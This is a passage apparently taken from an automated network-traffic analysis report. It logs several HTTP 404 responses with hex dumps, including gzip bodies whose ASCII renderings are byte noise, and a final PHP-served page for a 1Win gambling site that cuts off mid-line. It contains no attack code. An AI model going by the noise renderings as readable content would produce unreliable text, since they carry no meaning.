2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 07:06:40 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 07:06:43 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 07:07:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s1x2%2BpCmcGTg2AG9xhsfwb193NvJ2wC45Dhc0HPu73UdNHzQpMhmpOnY5pvxy3y1U66GANiXpCYFFdKh%2BxwE0oNu8%2BCSvm0HMWTlB%2BpGB73UvKJNDMu%2F0lV6w6pv7%2FZJInOnqB8Dzog%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bec9f097d937c6c-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 62 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 5c 5b 6f 23 37 96 7e 0f 90 ff c0 11 b0 c8 2e b6 aa ac 2a 49 96 d4 b1 bd 70 dc c9 a4 07 ee c4 9b ee 49 76 b0 18 18 14 8b 92 d8 cd 22 6b 58 a4 da ed bd bc f8 7d de b3 fd 96 97 7d 9b 3f d1 7e f0 cf 5a 9c 43 d6 45 17 5f da e9 0e 06 0b a4 63 a9 2e a7 58 e4 b9 7c e7 9c 8f 3a f8 97 72 59 7e fe d9 92 d3 9c 9b 7f fc e2 db 97 2f cf f6 d2 24 25 c3 fe 90 7c a7 2d f9 46 3b 95 7f f1 4f 5f 7e fe d9 bf 1c 7d fe d9 e7 9f 1d fc ee e9 f7 27 2f ff 74 f6 35 59 da 42 1e 7d fe d9 01 fc 25 92 aa c5 61 cf e8 f8 f9 d3 de d1 e7 9f 11 42 0e 40 a4 ff 08 df 0a 6e 29 59 5a 5b c6 fc 2f 4e ac 0e 7b 27 5a 59 ae 6c fc f2 6d c9 7b 84 f9 6f 87 3d cb 2f ec 1e 88 fc 92 b0 25 35 15 b7 87 7f 7c f9 4d 3c e9 6d 88 52 b4 e0 87 bd 95 e0 6f 4a 6d 6c 47 c0 1b 91 db e5 61 ce 57 82 f1 18 bf 44 44 28 61 05 95 71 c5 a8 e4 87 69 47 96 15 56 f2 a3 f4 27 a1 c8 7f 92 63 c6 78 45 6f de 09 52 09 cb 63 27 89 9e 0b 26 a8 24 54 92 52 52 3b d7 a6 e0 82 e4 9c bc d2 cc 19 41 d2 9f 9e 7d 37 e3 f6 60 cf cb 69 c4 4a a1 5e 13 c3 e5 61 af 34 9c 69 a5 38 b3 3d b2 34 7c 7e d8 83 49 a8 9e ec ed cd b5 b2 55 b2 d0 7a 21 39 2d 45 95 30 5d ec f5 1e 25 a3 b2 d4 0a e6 05 10 66 74 55 69 23 16 42 1d f6 36 e5 f9 db 93 3d 56 55 f0 2f eb f9 27 54 f6 ad e4 d5 92 73 7b d7 0d 78 55 c2 aa 6a fb 2e 62 df 96 3c ac 1e 5c b0 eb 35 04 d3 aa d7 08 14 c5 62 6f 4e 57 70 30 29 d5 a2 96 20 0a ba e0 7b 70 60 97 88 6a a9 8d 65 ce 92 ae ac 07 4a e9 a8 4d ce 2b 66 44 69 05 08 69 34 e7 b9 30 46 1b 32 77 8a dd bc 13 5a 51 49 6e 7e 16 84 32 eb a8 14 97 d4 82 1a c0 8a 93 92 2b 6b 1c a1 a0 2f 0e 94 7f 4b 61 e0 c6 f7 7f 53 86 2f 44 65 0d 35 3c a9 cd 62 af b5 8b 83 99 ce df b6 03 cc c5 8a 88 fc b0 57 d2 05 6f c7 5d 9f 61 92 56 95 3f 79 2e 94 e2 66 ed 92 da e0 b8 d9 38 ba 71 3b 5c 43 e6 f2 82 50 c1 c8 2b 56 cd 7a db d7 6f dc 22 f9 dc e2 2d 66 d8 27 f3 8b c5 ee 3b 36 6f d2 0b 4d 4c 3a ba f5 62 b8 9e 36 ca 70 d7 65 70 65 Data Ascii: 1b3a\[o#7~.*IpIv"kX}}?~ZCE_c.X|:rY~/$%|-F;O_~}'/t5YB}%aB@n)YZ[/N{'ZYlm{o=/%5|M<mRoJmlGaWDD(aqiGV'cxEoRc'&$TRR;A}7`iJ^a4i8=4|~IUz!9-E0]%ftUi#B6=VU/'Ts{xUj.b<\5boNWp0) {p`jeJM
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 07:07:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mvouXfpGVf%2FAPyScpXF1FVa%2F8%2BP1Q93%2B7napzLthYxsP2cYS%2BPUI3757UPgKDmaXAw5RV%2FdgjSduHNI5WMTtHfjse6e%2BoJDUocmdGWBQXaKUsfgZX3d6PZPFvwDqY0%2FEftO0r%2FC7k8s%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bec9f195faa19a1-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 62 34 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 5c 5b 6f 23 37 96 7e 0f 90 ff c0 11 b0 c8 2e b6 aa ac 2a 49 96 d4 b1 bd 70 dc c9 a4 07 ee c4 9b ee 49 76 b0 18 18 14 8b 92 d8 cd 22 6b 58 a4 da ed bd bc f8 7d de b3 fd 96 97 7d 9b 3f d1 7e f0 cf 5a 9c 43 d6 45 17 5f da e9 0e 06 0b a4 63 a9 2e a7 58 e4 b9 7c e7 9c 8f 3a f8 97 72 59 7e fe d9 92 d3 9c 9b 7f fc e2 db 97 2f cf f6 d2 24 25 c3 fe 90 7c a7 2d f9 46 3b 95 7f f1 4f 5f 7e fe d9 bf 1c 7d fe d9 e7 9f 1d fc ee e9 f7 27 2f ff 74 f6 35 59 da 42 1e 7d fe d9 01 fc 25 92 aa c5 61 cf e8 f8 f9 d3 de d1 e7 9f 11 42 0e 40 a4 ff 08 df 0a 6e 29 59 5a 5b c6 fc 2f 4e ac 0e 7b 27 5a 59 ae 6c fc f2 6d c9 7b 84 f9 6f 87 3d cb 2f ec 1e 88 fc 92 b0 25 35 15 b7 87 7f 7c f9 4d 3c e9 6d 88 52 b4 e0 87 bd 95 e0 6f 4a 6d 6c 47 c0 1b 91 db e5 61 ce 57 82 f1 18 bf 44 44 28 61 05 95 71 c5 a8 e4 87 69 47 96 15 56 f2 a3 f4 27 a1 c8 7f 92 63 c6 78 45 6f de 09 52 09 cb 63 27 89 9e 0b 26 a8 24 54 92 52 52 3b d7 a6 e0 82 e4 9c bc d2 cc 19 41 d2 9f 9e 7d 37 e3 f6 60 cf cb 69 c4 4a a1 5e 13 c3 e5 61 af 34 9c 69 a5 38 b3 3d b2 34 7c 7e d8 83 49 a8 9e ec ed cd b5 b2 55 b2 d0 7a 21 39 2d 45 95 30 5d ec f5 1e 25 a3 b2 d4 0a e6 05 10 66 74 55 69 23 16 42 1d f6 36 e5 f9 db 93 3d 56 55 f0 2f eb f9 27 54 f6 ad e4 d5 92 73 7b d7 0d 78 55 c2 aa 6a fb 2e 62 df 96 3c ac 1e 5c b0 eb 35 04 d3 aa d7 08 14 c5 62 6f 4e 57 70 30 29 d5 a2 96 20 0a ba e0 7b 70 60 97 88 6a a9 8d 65 ce 92 ae ac 07 4a e9 a8 4d ce 2b 66 44 69 05 08 69 34 e7 b9 30 46 1b 32 77 8a dd bc 13 5a 51 49 6e 7e 16 84 32 eb a8 14 97 d4 82 1a c0 8a 93 92 2b 6b 1c a1 a0 2f 0e 94 7f 4b 61 e0 c6 f7 7f 53 86 2f 44 65 0d 35 3c a9 cd 62 af b5 8b 83 99 ce df b6 03 cc c5 8a 88 fc b0 57 d2 05 6f c7 5d 9f 61 92 56 95 3f 79 2e 94 e2 66 ed 92 da e0 b8 d9 38 ba 71 3b 5c 43 e6 f2 82 50 c1 c8 2b 56 cd 7a db d7 6f dc 22 f9 dc e2 2d 66 d8 27 f3 8b c5 ee 3b 36 6f d2 0b 4d 4c 3a ba f5 62 b8 9e 36 Data Ascii: 1b46\[o#7~.*IpIv"kX}}?~ZCE_c.X|:rY~/$%|-F;O_~}'/t5YB}%aB@n)YZ[/N{'ZYlm{o=/%5|M<mRoJmlGaWDD(aqiGV'cxEoRc'&$TRR;A}7`iJ^a4i8=4|~IUz!9-E0]%ftUi#B6=VU/'Ts{xUj.b<\5boNWp0) {p`jeJM+fDii40F
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 07:07:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A%2BWmiFkkzBgAT%2FaSovLL9gC72YXX0XVhHcddRNV655VuUm%2FTFsVSbo8HCw6AtafwWDHxz2r3nm0E8XKRpOkZ6J8V049Ko%2BZYQd%2FzrUfpap01B3KGwas3GGFNgxHke%2FvMF0ol80c5Cmo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bec9f294d8a18fa-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 62 34 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 5c 5b 6f 23 37 96 7e 0f 90 ff c0 11 b0 c8 2e b6 aa ac 2a 49 96 d4 b1 bd 70 dc c9 a4 07 ee c4 9b ee 49 76 b0 18 18 14 8b 92 d8 cd 22 6b 58 a4 da ed bd bc f8 7d de b3 fd 96 97 7d 9b 3f d1 7e f0 cf 5a 9c 43 d6 45 17 5f da e9 0e 06 0b a4 63 a9 2e a7 58 e4 b9 7c e7 9c 8f 3a f8 97 72 59 7e fe d9 92 d3 9c 9b 7f fc e2 db 97 2f cf f6 d2 24 25 c3 fe 90 7c a7 2d f9 46 3b 95 7f f1 4f 5f 7e fe d9 bf 1c 7d fe d9 e7 9f 1d fc ee e9 f7 27 2f ff 74 f6 35 59 da 42 1e 7d fe d9 01 fc 25 92 aa c5 61 cf e8 f8 f9 d3 de d1 e7 9f 11 42 0e 40 a4 ff 08 df 0a 6e 29 59 5a 5b c6 fc 2f 4e ac 0e 7b 27 5a 59 ae 6c fc f2 6d c9 7b 84 f9 6f 87 3d cb 2f ec 1e 88 fc 92 b0 25 35 15 b7 87 7f 7c f9 4d 3c e9 6d 88 52 b4 e0 87 bd 95 e0 6f 4a 6d 6c 47 c0 1b 91 db e5 61 ce 57 82 f1 18 bf 44 44 28 61 05 95 71 c5 a8 e4 87 69 47 96 15 56 f2 a3 f4 27 a1 c8 7f 92 63 c6 78 45 6f de 09 52 09 cb 63 27 89 9e 0b 26 a8 24 54 92 52 52 3b d7 a6 e0 82 e4 9c bc d2 cc 19 41 d2 9f 9e 7d 37 e3 f6 60 cf cb 69 c4 4a a1 5e 13 c3 e5 61 af 34 9c 69 a5 38 b3 3d b2 34 7c 7e d8 83 49 a8 9e ec ed cd b5 b2 55 b2 d0 7a 21 39 2d 45 95 30 5d ec f5 1e 25 a3 b2 d4 0a e6 05 10 66 74 55 69 23 16 42 1d f6 36 e5 f9 db 93 3d 56 55 f0 2f eb f9 27 54 f6 ad e4 d5 92 73 7b d7 0d 78 55 c2 aa 6a fb 2e 62 df 96 3c ac 1e 5c b0 eb 35 04 d3 aa d7 08 14 c5 62 6f 4e 57 70 30 29 d5 a2 96 20 0a ba e0 7b 70 60 97 88 6a a9 8d 65 ce 92 ae ac 07 4a e9 a8 4d ce 2b 66 44 69 05 08 69 34 e7 b9 30 46 1b 32 77 8a dd bc 13 5a 51 49 6e 7e 16 84 32 eb a8 14 97 d4 82 1a c0 8a 93 92 2b 6b 1c a1 a0 2f 0e 94 7f 4b 61 e0 c6 f7 7f 53 86 2f 44 65 0d 35 3c a9 cd 62 af b5 8b 83 99 ce df b6 03 cc c5 8a 88 fc b0 57 d2 05 6f c7 5d 9f 61 92 56 95 3f 79 2e 94 e2 66 ed 92 da e0 b8 d9 38 ba 71 3b 5c 43 e6 f2 82 50 c1 c8 2b 56 cd 7a db d7 6f dc 22 f9 dc e2 2d 66 d8 27 f3 8b c5 ee 3b 36 6f d2 0b 4d 4c 3a ba f5 62 b8 9e 36 ca 70 d7 65 70 65 Data Ascii: 1b46\[o#7~.*IpIv"kX}}?~ZCE_c.X|:rY~/$%|-F;O_~}'/t5YB}%aB@n)YZ[/N{'ZYlm{o=/%5|M<mRoJmlGaWDD(aqiGV'cxEoRc'&$TRR;A}7`iJ^a4i8=4|~IUz!9-E0]%ftUi#B6=VU/'Ts{xUj.b<\5boNWp0) {p`jeJM
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Sep 2024 07:07:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5KbTlssbaJYxbcs9Tn0Iz6Wk5E9w0Vai3MHVa6WtctGFDFBoVVoboC4kPLx45IsNOl9kU4T4g2Zu95mXZyJ69iD7%2B0eAeio4S4i87fZVHg6RtZ1pn5yX%2Fe7oknV1hOvb1NwOJ%2F3dN0A%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bec9f391b305e86-EWRalt-svc: h3=":443"; ma=86400Data Raw: 33 66 62 39 0d 0a 3c 3f 70 68 70 0d 0a 68 65 61 64 65 72 28 27 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 27 29 3b 0d 0a 3f 3e 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 6f 2d 4d 44 22 3e 0d 0a 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 31 57 69 6e 20 7c 20 41 63 63 65 73 61 c8 9b 69 20 73 69 74 65 2d 75 6c 20 6f 66 69 63 69 61 6c 20 61 6c 20 70 6c 61 74 66 6f 72 6d 65 69 20 64 65 20 6a 6f 63 75 72 69 20 31 57 49 4e 62 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 22 3e 0d 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 22 3e 0d 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2e 2f 63 73 73 2f 63 73 73 32 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2e 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2e 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 Data Ascii: 3fb9<?phpheader('HTTP/1.1 404 Not Found');?><!DOCTYPE html><html lang="ro-MD"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>1Win | Accesai site-ul oficial al platformei de jocuri 1WINbet</title> <link rel="preconnect" href="https://fonts.googleapis.com/"> <li
